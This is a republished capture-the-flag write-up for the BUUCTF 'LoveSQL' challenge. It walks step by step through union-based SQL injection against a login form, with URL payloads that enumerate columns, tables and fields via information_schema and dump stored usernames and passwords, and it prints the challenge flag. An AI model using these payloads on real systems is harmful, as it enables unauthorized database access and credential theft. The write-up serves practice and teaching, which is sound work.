BUUCTF-WEB: [Geek Challenge 2019] LoveSQL 1

Others 2021-03-21 09:13:54 views: null


Tools: Firefox, hackbar
This is an example of a very conventional SQL union injection

step:

union injection process

The first step is to test the injection point ( some small tips: use quotation marks, and 1=1, or 1=1, etc. ) to determine whether it is a character type or a number type

payload:?username=1'%23&password=123 =====》NO,Wrong username password! ! ! At this time, it is entered in the url, so you cannot use #, and use its url encoding %23
                 ?username=1&password=123 =====》NO,Wrong username password! ! !

The second step, use order by to check the number of columns in the table

payload:?username=1' order by 1 %23&password=123       ======》NO,Wrong username password!!!
payload:?username=1' order by 4 %23&password=123       ======》Unknown column '4' in 'order clause'

It can be seen that the table has 3 columns

The third step, if there is an echo, find the echo position (echo is to display the batch command being executed and the result of execution, etc.)

payload:?username=1' union select 1,2,3 %23&password=123 

learned that 2, 3 is the echo position


The fourth step, use union select to explode database, explode table, explode field name, explode value

payload:?username=1' union select 1,2, database() %23&password=123 [ View database name ==》geek]

payload:?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23&password=123【查看表名==》geekuser,l0ve1ysq1】
或者/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

payload:?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'%23&password=123【查看列名===》id,username,password】

payload:?username=1' union select 1,2,group_concat(username) from geekuser%23&password=123[ explosive value, exploding geekuser==》no fruit ]


payload:?username=1' union select 1,2,group_concat( username,id,password) from l0ve1ysq1%23&password=123[ Try to explode l0ve1ysq1==》Get the flag ]

Get the flag: flag{5f7db3c7-1ce1-44d7-9d7d-892f8c66a671}

The joint injection knowledge points are not clear. View: https://blog.csdn.net/Waffle666/article/details/111410039

Guess you like

Origin blog.csdn.net/Waffle666/article/details/113200939
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com